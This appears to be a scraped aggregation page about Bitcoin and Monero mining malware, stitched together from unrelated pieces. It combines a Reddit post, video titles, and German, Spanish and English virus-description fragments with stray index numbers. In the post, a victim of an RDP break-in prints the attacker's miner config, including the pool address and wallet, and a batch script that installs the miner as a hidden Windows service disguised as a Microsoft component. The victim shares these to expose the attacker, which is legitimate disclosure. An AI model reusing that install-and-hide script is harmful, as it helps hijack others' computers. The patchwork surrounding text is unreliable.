Bitcoin Miner Virus - Wie man es erkennen und zu entfernen ...

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as it's configuration file and I'm posting the contents also publicly here:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "gulf.moneroocean.stream:80", "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "enabled": true, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "user-agent": null, "watch": true }
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat* net stop Networks taskkill /f /im system.exe C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe sc config "Networks20181019" DisplayName= "Networksr20181019" sc description "Networks20181019" "Microsoft Windows Networks" Set ProcessName=system.exe sc start "Networks20181019" attrib +a +s +r +h C:\WINDOWS\Debug\nat* echo u/off del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IP's publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address aswell.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero [link] [comments]

BEWARE THE BITCOIN VIRUS! (Bitcoin Trojan Provention) How to diagnose and remove a bitcoin miner trojan - YouTube HORRIBLE BITCOIN MINING VIRUS SPREADING - 30% INFECTED What is Bitcoin Mining? - YouTube Unedited: BitCoin mining Virus/Malware found, explained.

Riskware.Miner Symptoms of a Trojan.BitCoinMiner Infection As Trojan.BitCoinMiner's do not display a window and silently run in the background, many people do not even know that they are infected. Der BitCoin Miner-Virus oder der BitCoin Mining-Virus ist eine gefährliche Malware, die möglicherweise Ihre CPU und / oder GPU verwendet, um die BitCoin-Kryptowährung durch illegales Mining abzurufen. Cryptocurrency Miner greifen immer wieder auf Computer zu und versuchen, mit ihren Ressourcen Einnahmen für ihre Entwickler zu generieren. Obwohl diese Art der Infektion BitCoinMiner heißt ... Eine Krypto-Miner-Malware befällt Ihren PC oder andere Geräte wie ein gewöhnlicher Virus, beginnt dann aber damit, Ihr Gerät zum Berechnen einer digitalen Währung zu nutzen. Um etwa Bitcoins ... La actividad maliciosa del virus se compone de ejecutar múltiples scripts maliciosos en la PC infectada por una puerta trasera que el Virus Bitcoin Miner ejecuta de antemano. Estos scripts tienen el propósito de conectar el virus a un servidor de control y mando. Si el virus de minería usa diferentes clases para ejecutar más scripts que permiten que se lleven a cabo varias acciones: BitCoin miner virus or BitCoin mining virus is a dangerous malware that may use your CPU and/or GPU to obtain BitCoin cryptocurrency by mining illegally. Cryptocurrency miners keep hitting computers and trying to use their resources to generate revenue for their developers. Even though this type of infection is called BitCoinMiner, it does mine for digital currencies such as Monero ...

[index] [5394] [47360] [48943] [32542] [11448] [47357] [26324] [48574] [28360] [43508]

BEWARE THE BITCOIN VIRUS! (Bitcoin Trojan Provention)

For more information: https://www.bitcoinmining.com and https://www.weusecoins.com What is Bitcoin Mining? Have you ever wondered how Bitcoin is generated? T... This video is simply some unedited footage that I was preparing to show how malware that masquerades as a Realtek Audio Driver sits and uses system resources to mine Bitcoin for the malware author. What It Was Like MINING Cryptocurrency Full-Time For A Year Tails Health Update VoskCoin Rebrand - Duration: 23:44. VoskCoin Recommended for you BitcoinMiner is a Malware that was designed to force your computer to mine crypto-currency that is called Bitcoin. When the Bitcoins have been mined on the computer’s system, the designer of this... How to manually remove these little performance ruining bastards. These things are becoming the new epidemic. Most anti viruses don't detect them because the...

#